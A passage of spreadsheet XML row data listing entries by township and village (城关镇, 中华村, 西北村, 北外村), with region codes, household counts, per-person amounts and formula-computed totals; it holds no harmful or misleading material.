      <c r="B284" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C284" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D284" s="24" t="s">
        <v>919</v>
      </c>
      <c r="E284" s="24" t="s">
        <v>239</v>
      </c>
      <c r="F284" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G284" s="24">
        <v>1</v>
      </c>
      <c r="H284" s="24">
        <v>450</v>
      </c>
      <c r="I284" s="24">
        <f t="shared" si="4"/>
        <v>450</v>
      </c>
      <c r="J284" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K284" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="285" customHeight="1" spans="1:11">
      <c r="A285" s="23" t="s">
        <v>920</v>
      </c>
      <c r="B285" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C285" s="24" t="s">
        <v>220</v>
      </c>
      <c r="D285" s="24" t="s">
        <v>921</v>
      </c>
      <c r="E285" s="24" t="s">
        <v>340</v>
      </c>
      <c r="F285" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G285" s="24">
        <v>1</v>
      </c>
      <c r="H285" s="25">
        <v>365</v>
      </c>
      <c r="I285" s="24">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J285" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K285" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="286" customHeight="1" spans="1:11">
      <c r="A286" s="23" t="s">
        <v>922</v>
      </c>
      <c r="B286" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C286" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D286" s="24" t="s">
        <v>923</v>
      </c>
      <c r="E286" s="24" t="s">
        <v>753</v>
      </c>
      <c r="F286" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G286" s="24">
        <v>2</v>
      </c>
      <c r="H286" s="25">
        <v>325</v>
      </c>
      <c r="I286" s="24">
        <f t="shared" si="4"/>
        <v>650</v>
      </c>
      <c r="J286" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K286" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="287" customHeight="1" spans="1:11">
      <c r="A287" s="23" t="s">
        <v>924</v>
      </c>
      <c r="B287" s="24" t="str">
        <f>B286</f>
        <v>城关镇</v>
      </c>
      <c r="C287" s="24" t="str">
        <f>C286</f>
        <v>中华村</v>
      </c>
      <c r="D287" s="23" t="s">
        <v>925</v>
      </c>
      <c r="E287" s="23" t="s">
        <v>915</v>
      </c>
      <c r="F287" s="24" t="str">
        <f>F286</f>
        <v>4113210108</v>
      </c>
      <c r="G287" s="24"/>
      <c r="H287" s="24"/>
      <c r="I287" s="24">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="J287" s="24"/>
      <c r="K287" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="288" customHeight="1" spans="1:11">
      <c r="A288" s="23" t="s">
        <v>926</v>
      </c>
      <c r="B288" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C288" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D288" s="24" t="s">
        <v>927</v>
      </c>
      <c r="E288" s="24" t="s">
        <v>765</v>
      </c>
      <c r="F288" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G288" s="24">
        <v>1</v>
      </c>
      <c r="H288" s="25">
        <v>365</v>
      </c>
      <c r="I288" s="24">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J288" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K288" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="289" customHeight="1" spans="1:11">
      <c r="A289" s="23" t="s">
        <v>928</v>
      </c>
      <c r="B289" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C289" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D289" s="24" t="s">
        <v>929</v>
      </c>
      <c r="E289" s="24" t="s">
        <v>306</v>
      </c>
      <c r="F289" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G289" s="24">
        <v>2</v>
      </c>
      <c r="H289" s="25">
        <v>325</v>
      </c>
      <c r="I289" s="24">
        <f t="shared" si="4"/>
        <v>650</v>
      </c>
      <c r="J289" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K289" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="290" customHeight="1" spans="1:11">
      <c r="A290" s="23" t="s">
        <v>930</v>
      </c>
      <c r="B290" s="24" t="str">
        <f>B289</f>
        <v>城关镇</v>
      </c>
      <c r="C290" s="24" t="str">
        <f>C289</f>
        <v>西北村</v>
      </c>
      <c r="D290" s="23" t="s">
        <v>931</v>
      </c>
      <c r="E290" s="23" t="s">
        <v>320</v>
      </c>
      <c r="F290" s="24" t="str">
        <f>F289</f>
        <v>4113210106</v>
      </c>
      <c r="G290" s="24"/>
      <c r="H290" s="24"/>
      <c r="I290" s="24">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="J290" s="24"/>
      <c r="K290" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="291" customHeight="1" spans="1:11">
      <c r="A291" s="23" t="s">
        <v>932</v>
      </c>
      <c r="B291" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C291" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D291" s="24" t="s">
        <v>933</v>
      </c>
      <c r="E291" s="24" t="s">
        <v>239</v>
      </c>
      <c r="F291" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G291" s="24">
        <v>1</v>
      </c>
      <c r="H291" s="25">
        <v>365</v>
      </c>
      <c r="I291" s="24">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J291" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K291" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="292" customHeight="1" spans="1:11">
      <c r="A292" s="23" t="s">
        <v>934</v>
      </c>
      <c r="B292" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C292" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D292" s="24" t="s">
        <v>278</v>
      </c>
      <c r="E292" s="24" t="s">
        <v>935</v>
      </c>
      <c r="F292" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G292" s="24">
        <v>1</v>
      </c>
      <c r="H292" s="25">
        <v>365</v>
      </c>
      <c r="I292" s="24">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J292" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K292" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="293" customHeight="1" spans="1:11">
      <c r="A293" s="23" t="s">
        <v>936</v>
      </c>
      <c r="B293" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C293" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D293" s="24" t="s">
        <v>937</v>
      </c>
      <c r="E293" s="24" t="s">
        <v>938</v>
      </c>
      <c r="F293" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G293" s="24">
        <v>1</v>
      </c>
      <c r="H293" s="25">
        <v>365</v>
      </c>
      <c r="I293" s="24">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J293" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K293" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="294" customHeight="1" spans="1:11">
      <c r="A294" s="23" t="s">
        <v>939</v>
      </c>
      <c r="B294" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C294" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D294" s="24" t="s">
        <v>940</v>
      </c>
      <c r="E294" s="24" t="s">
        <v>265</v>
      </c>
      <c r="F294" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G294" s="24">
        <v>1</v>
      </c>
      <c r="H294" s="25">
        <v>365</v>
      </c>
      <c r="I294" s="24">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J294" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K294" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="295" customHeight="1" spans="1:11">
      <c r="A295" s="23" t="s">
        <v>941</v>
      </c>
      <c r="B295" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C295" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D295" s="24" t="s">
        <v>942</v>
      </c>
      <c r="E295" s="24" t="s">
        <v>432</v>
      </c>
      <c r="F295" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G295" s="24">
        <v>1</v>
      </c>
      <c r="H295" s="25">
        <v>365</v>
      </c>
      <c r="I295" s="24">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J295" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K295" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="296" customHeight="1" spans="1:11">
      <c r="A296" s="23" t="s">
        <v>943</v>
      </c>
      <c r="B296" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C296" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D296" s="24" t="s">
        <v>944</v>
      </c>
      <c r="E296" s="24" t="s">
        <v>239</v>
      </c>
      <c r="F296" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G296" s="24">
        <v>1</v>
      </c>
      <c r="H296" s="25">
        <v>365</v>
      </c>
      <c r="I296" s="24">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J296" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K296" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="297" customHeight="1" spans="1:11">
      <c r="A297" s="23" t="s">
        <v>945</v>
      </c>
      <c r="B297" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C297" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D297" s="24" t="s">
        <v>946</v>
      </c>
      <c r="E297" s="24" t="s">
        <v>947</v>
      </c>
      <c r="F297" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G297" s="24">
        <v>3</v>
      </c>
      <c r="H297" s="25">
        <v>290</v>
      </c>
      <c r="I297" s="24">
        <f t="shared" si="4"/>
        <v>870</v>
      </c>
      <c r="J297" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K297" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="298" customHeight="1" spans="1:11">
      <c r="A298" s="23" t="s">
        <v>948</v>
      </c>
      <c r="B298" s="24" t="str">
        <f>B297</f>
        <v>城关镇</v>
      </c>
      <c r="C298" s="24" t="str">
        <f>C297</f>
        <v>中华村</v>
      </c>
      <c r="D298" s="23" t="s">
        <v>949</v>
      </c>
      <c r="E298" s="23" t="s">
        <v>950</v>
      </c>
      <c r="F298" s="24" t="str">
        <f>F297</f>
        <v>4113210108</v>
      </c>
      <c r="G298" s="24"/>
      <c r="H298" s="24"/>
      <c r="I298" s="24">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="J298" s="24"/>
      <c r="K298" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="299" customHeight="1" spans="1:11">
      <c r="A299" s="23" t="s">
        <v>951</v>
      </c>
      <c r="B299" s="24" t="str">
        <f>B298</f>
        <v>城关镇</v>
      </c>
      <c r="C299" s="24" t="str">
        <f>C298</f>
        <v>中华村</v>
      </c>
      <c r="D299" s="23" t="s">
        <v>952</v>
      </c>
      <c r="E299" s="23" t="s">
        <v>953</v>
      </c>
      <c r="F299" s="24" t="str">
        <f>F298</f>
        <v>4113210108</v>
      </c>
      <c r="G299" s="24"/>
      <c r="H299" s="24"/>
      <c r="I299" s="24">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="J299" s="24"/>
      <c r="K299" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="300" customHeight="1" spans="1:11">
      <c r="A300" s="23" t="s">
        <v>954</v>
      </c>
      <c r="B300" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C300" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D300" s="24" t="s">
        <v>955</v>
      </c>
      <c r="E300" s="24" t="s">
        <v>497</v>
      </c>
      <c r="F300" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G300" s="24">
        <v>1</v>
      </c>
      <c r="H300" s="25">
        <v>365</v>
      </c>
      <c r="I300" s="24">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J300" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K300" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="301" customHeight="1" spans="1:11">
      <c r="A301" s="23" t="s">
        <v>956</v>
      </c>
      <c r="B301" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C301" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D301" s="24" t="s">
        <v>957</v>
      </c>
      <c r="E301" s="24" t="s">
        <v>958</v>
      </c>
      <c r="F301" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G301" s="24">
        <v>1</v>
      </c>
      <c r="H301" s="25">
        <v>365</v>
      </c>
      <c r="I301" s="24">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J301" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K301" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="302" customHeight="1" spans="1:11">
      <c r="A302" s="23" t="s">
        <v>959</v>
      </c>
      <c r="B302" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C302" s="24" t="s">
        <v>318</v>
      </c>
      <c r="D302" s="24" t="s">
        <v>960</v>
      </c>
      <c r="E302" s="24" t="s">
        <v>961</v>
      </c>
      <c r="F302" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G302" s="24">
        <v>2</v>
      </c>
      <c r="H302" s="25">
        <v>325</v>
      </c>
      <c r="I302" s="24">
        <f t="shared" si="4"/>
        <v>650</v>
      </c>
      <c r="J302" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K302" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="303" customHeight="1" spans="1:11">
      <c r="A303" s="23" t="s">
        <v>962</v>
      </c>
      <c r="B303" s="24" t="str">
        <f>B302</f>
        <v>城关镇</v>
      </c>
      <c r="C303" s="24" t="str">
        <f>C302</f>
        <v>东北一组</v>
      </c>
      <c r="D303" s="23" t="s">
        <v>963</v>
      </c>
      <c r="E303" s="23" t="s">
        <v>402</v>
      </c>
      <c r="F303" s="24" t="str">
        <f>F302</f>
        <v>4113210103</v>
      </c>
      <c r="G303" s="24"/>
      <c r="H303" s="24"/>
      <c r="I303" s="24">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="J303" s="24"/>
      <c r="K303" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="304" customHeight="1" spans="1:11">
      <c r="A304" s="23" t="s">
        <v>964</v>
      </c>
      <c r="B304" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C304" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D304" s="24" t="s">
        <v>965</v>
      </c>
      <c r="E304" s="24" t="s">
        <v>947</v>
      </c>
      <c r="F304" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G304" s="24">
        <v>1</v>
      </c>
      <c r="H304" s="25">
        <v>365</v>
      </c>
      <c r="I304" s="24">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J304" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K304" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="305" customHeight="1" spans="1:11">
      <c r="A305" s="23" t="s">
        <v>966</v>
      </c>
      <c r="B305" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C305" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D305" s="24" t="s">
        <v>967</v>
      </c>
      <c r="E305" s="24" t="s">
        <v>346</v>
      </c>
      <c r="F305" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G305" s="24">
        <v>2</v>
      </c>
      <c r="H305" s="25">
        <v>325</v>
      </c>
      <c r="I305" s="24">
        <f t="shared" si="4"/>
        <v>650</v>
      </c>
      <c r="J305" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K305" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="306" customHeight="1" spans="1:11">
      <c r="A306" s="23" t="s">
        <v>968</v>
      </c>
      <c r="B306" s="24" t="str">
        <f>B305</f>
        <v>城关镇</v>
      </c>
      <c r="C306" s="24" t="str">
        <f>C305</f>
        <v>西北村</v>
      </c>
      <c r="D306" s="23" t="s">
        <v>969</v>
      </c>
      <c r="E306" s="23" t="s">
        <v>370</v>
      </c>
      <c r="F306" s="24" t="str">
        <f>F305</f>
        <v>4113210106</v>
      </c>
      <c r="G306" s="24"/>
      <c r="H306" s="24"/>
      <c r="I306" s="24">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="J306" s="24"/>
      <c r="K306" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="307" customHeight="1" spans="1:11">
      <c r="A307" s="23" t="s">
        <v>970</v>
      </c>
      <c r="B307" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C307" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D307" s="24" t="s">
        <v>971</v>
      </c>
      <c r="E307" s="24" t="s">
        <v>972</v>
      </c>
      <c r="F307" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G307" s="24">
        <v>2</v>
      </c>
      <c r="H307" s="25">
        <v>325</v>
      </c>
      <c r="I307" s="24">
        <f t="shared" si="4"/>
        <v>650</v>
      </c>
      <c r="J307" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K307" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="308" customHeight="1" spans="1:11">
      <c r="A308" s="23" t="s">
        <v>973</v>
      </c>
      <c r="B308" s="24" t="str">
        <f>B307</f>
        <v>城关镇</v>
      </c>
      <c r="C308" s="24" t="str">
        <f>C307</f>
        <v>中华村</v>
      </c>
      <c r="D308" s="23" t="s">
        <v>974</v>
      </c>
      <c r="E308" s="23" t="s">
        <v>772</v>
      </c>
      <c r="F308" s="24" t="str">
        <f>F307</f>
        <v>4113210108</v>
      </c>
      <c r="G308" s="24"/>
      <c r="H308" s="24"/>
      <c r="I308" s="24">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="J308" s="24"/>
      <c r="K308" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="309" customHeight="1" spans="1:11">
      <c r="A309" s="23" t="s">
        <v>975</v>
      </c>
      <c r="B309" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C309" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D309" s="24" t="s">
        <v>976</v>
      </c>
      <c r="E309" s="24" t="s">
        <v>977</v>
      </c>
      <c r="F309" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G309" s="24">
        <v>1</v>
      </c>
      <c r="H309" s="25">
        <v>365</v>
      </c>
      <c r="I309" s="24">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J309" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K309" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="310" customHeight="1" spans="1:11">
      <c r="A310" s="23" t="s">
        <v>978</v>
      </c>
      <c r="B310" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C310" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D310" s="24" t="s">
        <v>979</v>
      </c>
      <c r="E310" s="24" t="s">
        <v>980</v>
      </c>
      <c r="F310" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G310" s="24">
        <v>2</v>
      </c>
      <c r="H310" s="25">
        <v>325</v>
      </c>
      <c r="I310" s="24">
        <f t="shared" si="4"/>
        <v>650</v>
      </c>
      <c r="J310" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K310" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="311" customHeight="1" spans="1:11">
      <c r="A311" s="23" t="s">
        <v>981</v>
      </c>
      <c r="B311" s="24" t="str">
        <f>B310</f>
        <v>城关镇</v>
      </c>
      <c r="C311" s="24" t="str">
        <f>C310</f>
        <v>北外村</v>
      </c>
      <c r="D311" s="23" t="s">
        <v>982</v>
      </c>
      <c r="E311" s="23" t="s">
        <v>983</v>
      </c>
      <c r="F311" s="24" t="str">
        <f>F310</f>
        <v>4113210102</v>
      </c>
      <c r="G311" s="24"/>
      <c r="H311" s="24"/>
      <c r="I311" s="24">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="J311" s="24"/>
      <c r="K311" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="312" customHeight="1" spans="1:11">
      <c r="A312" s="23" t="s">
        <v>984</v>
      </c>
      <c r="B312" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C312" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D312" s="24" t="s">
        <v>985</v>
      </c>
      <c r="E312" s="24" t="s">
        <v>323</v>
      </c>
      <c r="F312" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G312" s="24">
        <v>1</v>
      </c>
      <c r="H312" s="25">
        <v>365</v>
      </c>
      <c r="I312" s="24">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J312" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K312" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="313" customHeight="1" spans="1:11">
      <c r="A313" s="23" t="s">
        <v>986</v>
      </c>
      <c r="B313" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C313" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D313" s="24" t="s">
        <v>987</v>
      </c>
      <c r="E313" s="24" t="s">
        <v>222</v>
      </c>
      <c r="F313" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G313" s="24">
        <v>2</v>
      </c>
      <c r="H313" s="25">
        <v>325</v>
      </c>
      <c r="I313" s="24">
        <f t="shared" si="4"/>
        <v>650</v>
      </c>
      <c r="J313" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K313" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="314" customHeight="1" spans="1:11">
      <c r="A314" s="23" t="s">
        <v>988</v>
      </c>
      <c r="B314" s="24" t="str">
        <f>B313</f>
        <v>城关镇</v>
      </c>
      <c r="C314" s="24" t="str">
        <f>C313</f>
        <v>中华村</v>
      </c>
      <c r="D314" s="23" t="s">
        <v>989</v>
      </c>
      <c r="E314" s="23" t="s">
        <v>730</v>
      </c>
      <c r="F314" s="24" t="str">
        <f>F313</f>
        <v>4113210108</v>
      </c>
      <c r="G314" s="24"/>
      <c r="H314" s="24"/>
      <c r="I314" s="24">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="J314" s="24"/>
      <c r="K314" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="315" customHeight="1" spans="1:11">
      <c r="A315" s="23" t="s">
        <v>990</v>
      </c>
      <c r="B315" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C315" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D315" s="24" t="s">
        <v>991</v>
      </c>
      <c r="E315" s="24" t="s">
        <v>497</v>
      </c>
      <c r="F315" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G315" s="24">
        <v>1</v>
      </c>
      <c r="H315" s="25">
        <v>365</v>
      </c>
      <c r="I315" s="24">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J315" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K315" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="316" customHeight="1" spans="1:11">
      <c r="A316" s="23" t="s">
        <v>992</v>
      </c>
      <c r="B316" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C316" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D316" s="24" t="s">
        <v>993</v>
      </c>
      <c r="E316" s="24" t="s">
        <v>432</v>
      </c>
      <c r="F316" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G316" s="24">
        <v>1</v>
      </c>
      <c r="H316" s="25">
        <v>365</v>
      </c>
      <c r="I316" s="24">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J316" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K316" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="317" customHeight="1" spans="1:11">
      <c r="A317" s="23" t="s">
        <v>994</v>
      </c>
      <c r="B317" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C317" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D317" s="24" t="s">
        <v>995</v>
      </c>
      <c r="E317" s="24" t="s">
        <v>497</v>
      </c>
      <c r="F317" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G317" s="24">
        <v>1</v>
      </c>
      <c r="H317" s="25">
        <v>365</v>
      </c>
      <c r="I317" s="24">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J317" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K317" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="318" customHeight="1" spans="1:11">
      <c r="A318" s="23" t="s">
        <v>996</v>
      </c>
      <c r="B318" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C318" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D318" s="24" t="s">
        <v>997</v>
      </c>
      <c r="E318" s="24" t="s">
        <v>479</v>
      </c>
      <c r="F318" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G318" s="24">
        <v>2</v>
      </c>
      <c r="H318" s="25">
        <v>325</v>
      </c>
      <c r="I318" s="24">
        <f t="shared" si="4"/>
        <v>650</v>
      </c>
      <c r="J318" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K318" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="319" customHeight="1" spans="1:11">
      <c r="A319" s="23" t="s">
        <v>998</v>
      </c>
      <c r="B319" s="24" t="str">
        <f>B318</f>
        <v>城关镇</v>
      </c>
      <c r="C319" s="24" t="str">
        <f>C318</f>
        <v>中华村</v>
      </c>
      <c r="D319" s="23" t="s">
        <v>999</v>
      </c>
      <c r="E319" s="23" t="s">
        <v>1000</v>
      </c>
      <c r="F319" s="24" t="str">
        <f>F318</f>
        <v>4113210108</v>
      </c>
      <c r="G319" s="24"/>
      <c r="H319" s="24"/>
      <c r="I319" s="24">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="J319" s="24"/>
      <c r="K319" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="320" customHeight="1" spans="1:11">
      <c r="A320" s="23" t="s">
        <v>1001</v>
      </c>
      <c r="B320" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C320" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D320" s="24" t="s">
        <v>1002</v>
      </c>
      <c r="E320" s="24" t="s">
        <v>382</v>
      </c>
      <c r="F320" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G320" s="24">
        <v>2</v>
      </c>
      <c r="H320" s="25">
        <v>325</v>
      </c>
      <c r="I320" s="24">
        <f t="shared" si="4"/>
        <v>650</v>
      </c>
      <c r="J320" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K320" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="321" customHeight="1" spans="1:11">
      <c r="A321" s="23" t="s">
        <v>1003</v>
      </c>
      <c r="B321" s="24" t="str">
        <f>B320</f>
        <v>城关镇</v>
      </c>
      <c r="C321" s="24" t="str">
        <f>C320</f>
        <v>北外村</v>
      </c>
      <c r="D321" s="23" t="s">
        <v>1004</v>
      </c>
      <c r="E321" s="23" t="s">
        <v>239</v>
      </c>
      <c r="F321" s="24" t="str">
        <f>F320</f>
        <v>4113210102</v>
      </c>
      <c r="G321" s="24"/>
      <c r="H321" s="24"/>
      <c r="I321" s="24">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="J321" s="24"/>
      <c r="K321" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="322" customHeight="1" spans="1:11">
      <c r="A322" s="23" t="s">
        <v>1005</v>
      </c>
      <c r="B322" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C322" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D322" s="24" t="s">
        <v>1006</v>
      </c>
      <c r="E322" s="24" t="s">
        <v>273</v>
      </c>
      <c r="F322" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G322" s="24">
        <v>1</v>
      </c>
      <c r="H322" s="25">
        <v>365</v>
      </c>
      <c r="I322" s="24">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J322" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K322" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="323" customHeight="1" spans="1:11">
      <c r="A323" s="23" t="s">
        <v>1007</v>
      </c>
      <c r="B323" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C323" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D323" s="24" t="s">
        <v>1008</v>
      </c>
      <c r="E323" s="24" t="s">
        <v>1009</v>
      </c>
      <c r="F323" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G323" s="24">
        <v>1</v>
      </c>
      <c r="H323" s="25">
        <v>365</v>
      </c>
      <c r="I323" s="24">
        <f t="shared" si="4"/>
        <v>365</v>
      </c>
      <c r="J323" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K323" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="324" customHeight="1" spans="1:11">
      <c r="A324" s="23" t="s">
        <v>1010</v>
      </c>
      <c r="B324" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C324" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D324" s="24" t="s">
        <v>1011</v>
      </c>
      <c r="E324" s="24" t="s">
        <v>312</v>
      </c>
      <c r="F324" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G324" s="24">
